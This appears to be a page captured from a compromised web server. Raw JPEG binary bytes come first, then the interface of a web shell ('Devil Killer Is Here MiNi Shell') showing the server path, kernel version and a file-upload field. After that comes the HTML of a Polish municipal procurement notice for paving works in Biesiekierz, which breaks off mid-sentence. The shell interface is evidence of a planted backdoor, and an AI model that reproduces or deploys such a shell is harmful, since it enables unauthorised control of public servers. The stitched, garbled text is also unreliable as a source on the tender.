JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210817/0015151001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zagospodarowanie przestrzeni publicznej wokół Urzędu Gminy w Biesiekierzu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BIESIEKIERZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920535</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biesiekierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-039</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 94 3180 955</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 94 3180 940</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@biesiekierz.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.biesiekierz.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodarowanie przestrzeni publicznej wokół Urzędu Gminy w Biesiekierzu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6811498e-ff4d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00151510</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000337/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Zagospodarowanie przestrzeni publicznej wokół Urzędu Gminy w Biesiekierzu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.biesiekierz.eu/index.php?id=102&rp=1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>miniPortalu pod adresem https://miniportal.uzp.gov.pl/ , ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: zp@biesiekierz.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: Formularza do złożenia, zmiany, wycofania oferty lub wniosku oraz Formularza do<br/>komunikacji.<br/>2) Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy użyciu formularzy, o których mowa w pkt 2 powyżej, opisane zostały w<br/>Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP).<br/>3) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: Formularza<br/>do złożenia, zmiany, wycofania ofert lub wniosku oraz Formularza do komunikacji wynosi 150 MB.<br/>4) Ofertę w przedmiotowym postępowaniu Wykonawca składa za pośrednictwem Formularza do<br/>złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Sposób złożenia oferty został szczegółowo opisany w Rozdziale III ust. 3 SWZ.<br/>5) Komunikacja w postępowaniu o udzielenie zamówienia (nie dotyczy złożenia oferty) odbywa się<br/>elektronicznie za pośrednictwem:<br/>a) dedykowanego Formularza do komunikacji dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal;<br/>lub<br/>b) poczty elektronicznej, na adres e-mail: zp@biesiekierz.eu<br/>6) Za datę przekazania za pośrednictwem ePUAP oferty, oświadczenia, o którym mowa w art. 125 ust.<br/>1 ustawy PZP, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz<br/>innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę<br/>ich przekazania na ePUAP. 7) Przy komunikacji za pośrednictwem poczty elektronicznej Zamawiający lub Wykonawca na żądanie<br/>drugiej strony niezwłocznie potwierdza fakt otrzymania wiadomości. W przypadku niepotwierdzenia ze<br/>strony Wykonawcy odbioru przesłanych wiadomości (pomimo takiego żądania) Zamawiający uzna, że<br/>wiadomość została skutecznie przekazana do Wykonawcy.<br/>8) Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)Administratorem Pani/Pana danych osobowych jest Wójt<br/>Gminy Biesiekierz z siedzibą w Biesiekierzu 103, 76-039,mail:wojt@biesiekierz.eu , nr<br/>tel.+48943180955; 2)Inspektorem ochrony danych jest Pan Dariusz Florek, iod@biesiekierz.eu; 76-039<br/>Biesiekierz 103.3)Pani/Pana dane osobowe przetwarzane będą w celu: a)związanym z potrzebą<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego pn. Zagospodarowanie<br/>przestrzeni publicznej wokół Urzędu Gminy w Biesiekierzu, oraz obsługą przez ADMINISTRATORA<br/>kontrahentów i współpracowników na podstawie przepisów Pzp;b)realizacji i wykonywania umowy,<br/>której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane<br/>dotyczą, przed zawarciem umowy, w celu przeprowadzenia postępowania w ramach procedury<br/>zamówień publicznych przez ADMINISTRATORA, a także obsługi przez ADMINISTRATORA<br/>kontrahentów i współpracowników w zakresie wypełniania obowiązku wynikającego z umów zawartych<br/>na podstawie Pzp; c) niezbędnym dla ustalenia, dochodzenia lub obrony roszczeń wynikających ze<br/>zobowiązań, np. roszczeń finansowych względem kontrahentów – wykonawców, biorących udział w<br/>postępowaniu organizowanym przez ADMINISTRATORA, wynikających z naliczonych opłat i kar lub<br/>kontraktowych, w celu rozliczeń zawartych umów z kontrahentami ADMINISTRATORA;4)odbiorcą<br/>Pani/Pana danych osobowych będą:a)osoby lub organy władzy publicznej oraz podmioty wykonujące<br/>zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które<br/>wynikają z przepisów powszechnie obowiązującego prawa, w szczególności którym udostępniona<br/>zostanie dokumentacja postępowania; b)dane mogą być także przekazywane innym podmiotom,<br/>zapewniającym obsługę administracyjną, techniczną i informatyczną ADMINISTRATORA, a w<br/>szczególności podmiotom administrującym systemami informatycznymi, serwisujących sprzęt<br/>informatyczny, zapewniającym transport dokumentów i nośników elektronicznych, zapewniającym<br/>niszczenie dokumentów i nośników elektronicznych oraz podmiotom zapewniającym obsługę prawną.<br/>Przekazywanie danych realizowane będzie na podstawie zawartych umów, w tym powierzenia<br/>przetwarzania danych, a podmioty przetwarzające mogą je przetwarzać jedynie na polecenie<br/>ADMINISTRATORA, co należy rozumieć w ten sposób, że nie są uprawnione do przetwarzania tych<br/>danych we własnych celach.5) Pani/Pana dane osobowe nie będą przekazywane do państwa<br/>trzeciego/organizacji międzynarodowej.6) Pani/Pana dane osobowe będą przechowywane przez okres<br/>niezbędny do realizacji celów w jakich je pozyskano, zgodnie z Pzp oraz instrukcją kancelaryjną lub<br/>wewnętrznymi regulacjami administratora, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata – okres przechowywania<br/>obejmuje cały czas trwania umowy, a po tym okresie przez czas oraz w zakresie wymaganym przez<br/>przepisy powszechnie obowiązującego prawa;7) posiada Pani/Pan prawo do:a)dostępu do treści<br/>swoich danych oraz prawo ich sprostowania, ograniczenia przetwarzania, b)nie przysługuje Pani/Panu:<br/>−w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;−prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO;−na podstawie art. 21 RODO prawo<br/>sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO. 8) ma Pan/Pani prawo wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO, w następujący sposób:Listownie: Prezes Urzędu<br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa;Przez elektroniczną skrzynkę podawczą dostępną na stronie: https://www.uodo.gov.pl/pl/p/kontakt;Telefonicznie: (22) 5310300;9) podanie<br/>przez Pana/Panią danych osobowych jest: c.d. poniżej</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">wymogiem obowiązkowym, gdy przesłanką przetwarzania<br/>danych osobowych jest zawarta umowa, której stroną jest osoba, której dane dotyczą, lub gdy do<br/>podjęcia działań w związku z przygotowaniem umowy jest żądanie osoby, której dane dotyczą, przed<br/>zawarciem tej umowy;b)wymogiem ustawowym, gdy przesłanką przetwarzania danych osobowych jest<br/>przepis prawa, w przypadku prowadzenia zamówienia publicznego stosuje się obowiązek<br/>przetwarzania danych wynikający z ustawy Pzp. Jest Pan/Pani zobowiązana do ich podania a<br/>konsekwencją niepodania danych osobowych może być naruszenie przepisów prawa, odmowa ze<br/>strony ADMINISTRATOR zawarcia umowy.10) Pani/Pana dane nie będą przetwarzane w sposób<br/>zautomatyzowany, w tym również w formie profilowania. 11) W przypadku skorzystania przez<br/>Panią/Pana z uprawnień określonych w art. 15 ust. 1 do 3 RODO, niosącego po stronie<br/>ADMINISTRATORA niewspółmiernie dużego wysiłku, ADMINISTRATOR może żądać od Pani/Pana<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.12) Skorzystanie z<br/>prawa do sprostowania lub uzupełnienia danych nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego<br/>załączników.13) Wystąpienie z żądaniem ograniczenia przetwarzania nie ogranicza przetwarzania<br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub<br/>konkursu. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego.<br/>(jak w pkt 3.15 i 3.16)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG.SR.271.4.2021.KK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 317086,68 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiot zamówienia stanowi realizacja zadania pn. Zagospodarowanie przestrzeni<br/>publicznej wokół Urzędu Gminy w Biesiekierzu. W ramach realizacji zadania Wykonawca<br/>obowiązany jest wykonać odwodnienie i utwardzenie działki budowlanej nr 67 i 68/1 w<br/>Biesiekierzu (teren wokół budynku Urzędu Gminy w Biesiekierzu) poprzez wykonanie nowej<br/>konstrukcji nawierzchni placów, w części przełożenie istniejącej nawierzchni z kostki celem<br/>dostosowania wysokościowego, wykonanie ogrodzeń wokół działki nr 67 i 68/1 oraz ustawienie<br/>elementów małej architektury.<br/>2) Zakres przedmiotu zamówienia obejmuje:<br/>a) ROBOTY PRZYGOTOWAWCZE - roboty pomiarowe - koryta pod nawierzchnie placów postojowych (0,14 ha); usunięcie warstwy humusu i darniny grubości 40cm, z wywozem<br/>nadmiaru na odkład w miejsce wybrane przez Wykonawcę (650 m2); rozebranie nawierzchni z<br/>betonu o grubości 15cm wraz z wywozem materiału z rozbiórki w miejsce wybrane przez<br/>Wykonawcę (425 m2) i rozebranie ogrodzenia z siatki na linkach (91,5 m)<br/>b) ROBOTY ZIEMNE - wykonanie wykopów mechanicznie w gruncie kategorii I -II do głębokości<br/>3,0m z transportem urobku w miejsce wybrane przez Wykonawcę (87,9 m3) oraz wykonanie<br/>nasypów wraz z zagęszczeniem, pozyskaniem gruntu kategorii I (100,7 m3)<br/>c) PODŁOŻE I PODBUDOWY - koryta o głębokości 50cm pod zjazdy oraz skrzyżowania<br/>wykonywane mechanicznie w gruncie kategorii II-VI z profilowaniem, zagęszczeniem oraz<br/>wywozem urobku w miejsce wybrane przez Wykonawcę (1311,2 m2); podbudowy z kruszyw<br/>łamanych, grubość warstwy po zagęszczeniu 20cm (1311,2 m2); mieszanka kruszywa związana<br/>hydraulicznie cementem C1.5/2, grubość warstwy po zagęszczeniu 22cm (1198,5 m2)<br/>d) NAWIERZCHNIE - nawierzchnia z kostki brukowej betonowej grubości 8cm na podsypce<br/>cementowo-piaskowej z wypełnieniem spoin piaskiem w kolorach: szarym 789,1 m2; grafitowym<br/>342,6 m2; niebieskim 36,9 m2; piaskowym 77,2 m2; przełożenie nawierzchni istniejącej 65,4 m2<br/>e) ROBOTY WYKOŃCZENIOWE - humusowanie z obsianiem trawą przy grubości humusu 10<br/>cm - humus pozyskany na budowie (866 m2)<br/>f) ELEMENTY ULIC - krawężniki betonowe o wymiarach 15x22cm (kolor szary), z wykonaniem<br/>ławy betonowej o przekroju 0.075m2, na podsypce cementowo-piaskowej (129,7 m); obrzeża<br/>betonowe o wymiarach 30x8cm na podsypce cementowo-piaskowej z wypełnieniem spoin<br/>zaprawą cementową (72 m)<br/>g) INNE ROBOTY - wykonanie ogrodzeń panelowych o wysokości 1.5m z prętów zgrzewanych<br/>punktowo ocynkowanych z powłoką PVC, średnica drutu 4.5mm na słupach stalowych<br/>obsadzonych w stopce betonowej (196,7 m); ustawienie ławki ze stali nierdzewnej o min.<br/>długości 190 cm. (2 szt.); Ustawienie kosza na odpadki ze stali nierdzewnej z wkładem z blachy<br/>60 litrów (1 szt.); ustawienie stojaka na rowery ze stali nierdzewnej, ilość stanowisk 10 (1 szt.);<br/>Wykonanie studzienki ściekowej betonowej z betonu B-45 średnicy 500mm z osadnikiem (wpust<br/>żeliwny) (1 sz.); Dren z rur PVC średnicy 100mm obsypany żwirem układany na głębokości<br/>min.90cm wraz z robotami ziemnymi (95,9 m.); Wykonanie studni rewizyjnych z<br/>prefabrykowanych kręgów żelbetowych o śr. 1000mm głębokości do 3.0m z osadnikiem typu BS<br/>beton C35/45 wraz z robotami ziemnymi (2 szt.); Wykonanie przykanalika z rur PCV o średnicy<br/>200mm wraz z robotami ziemnymi (48 m.); Wykonanie przykanalika z rur PCV o średnicy<br/>160mm wraz z robotami ziemnymi oraz podłączeniem rynny (16,2 m)<br/>h) wykonanie dokumentacji geodezyjnej powykonawczej zgodnie z ZUDP, zatwierdzonej w<br/>Starostwie Powiatowym w Koszalinie.<br/>3) Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie<br/>realizacji i odbioru określają:<br/>a) dokumentacja projektowa, stanowiąca załącznik nr 6 do SWZ,<br/>b) projektowane postanowienia umowy, stanowiące załącznik nr 5 SWZ.<br/>Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania<br/>minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie<br/>skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226<br/>ust. 1 pkt 5 ustawy Pzp.<br/>UWAGA: Załączony przedmiar robót ma charakter pomocniczy. Podstawą do wyceny robót jest<br/>dokumentacja projektowa.<br/>Rozwiązania równoważne<br/>1) Jeżeli Zamawiający w opisie przedmiotu zamówienia wskazał znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi<br/>dostarczane przez konkretnego wykonawcę, dopuszcza się zaoferowanie rozwiązań<br/>równoważnych opisanym, pod warunkiem zachowania przez nie takich samych minimalnych<br/>parametrów technicznych, jakościowych oraz funkcjonalnych itp.<br/>2) Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez Zamawiającego. W<br/>takim przypadku, Wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego<br/>opisem lub normami.<br/>3) W przypadku, gdy w opisie przedmiotu zamówienia znajdą się odniesienia do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa<br/>wart. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne<br/>opisywanym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>Punkty będą liczone z dokładnością do dwóch miejsc po przecinku.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>najniższa cena ze wszystkich ofert brutto<br/>cena = ------------------------------------------ x 60 pkt<br/>cena badanej kolejno oferty brutto<br/><br/>Oferta może otrzymać maksymalnie 20 pkt w zakresie kryterium przedłużenie terminu gwarancji. W<br/>kryterium tym oceniany będzie czas wydłużenia minimalnego okresu wymaganej gwarancji. Oferty z<br/>okresem gwarancji krótszym od minimalnego zostaną odrzucone. Dla oferty bez podania okresu wydłużenia gwarancji Zamawiający przyjmie minimalny okres. Podanie w ofercie dłuższego od<br/>maksymalnego punktowanego okresu gwarancji spowoduje przyznanie Wykonawcy maksymalnej<br/>liczby punktów w tym kryterium (do umowy zostanie wpisany oferowany okres gwarancji).<br/>Oferty będą oceniane metodą punktową wg następujących zasad:<br/>Minimalny okres gwarancji tj. 36 miesięcy – 0 pkt<br/>Okres gwarancji 48 miesięcy– 10 pkt<br/>Okres gwarancji 60 miesięcy – 20 pkt<br/><br/>Oferta może otrzymać maksymalnie 20 pkt w zakresie kryterium skrócenie terminu realizacji<br/>zamówienia. Ocena kryterium zostanie dokonana poprzez zastosowanie następującej punktacji:<br/>realizacja przedmiotu zamówienia w wymaganym przez Zamawiającego terminie, tj. 3 miesięcy od dnia<br/>zawarcia umowy – 0 pkt<br/>skrócenie terminu realizacji przedmiotu zamówienia o dwa tygodnie, tj. realizacja przedmiotu<br/>zamówienia w terminie 2miesięcy i 2 tygodni od dnia zawarcia umowy – 10 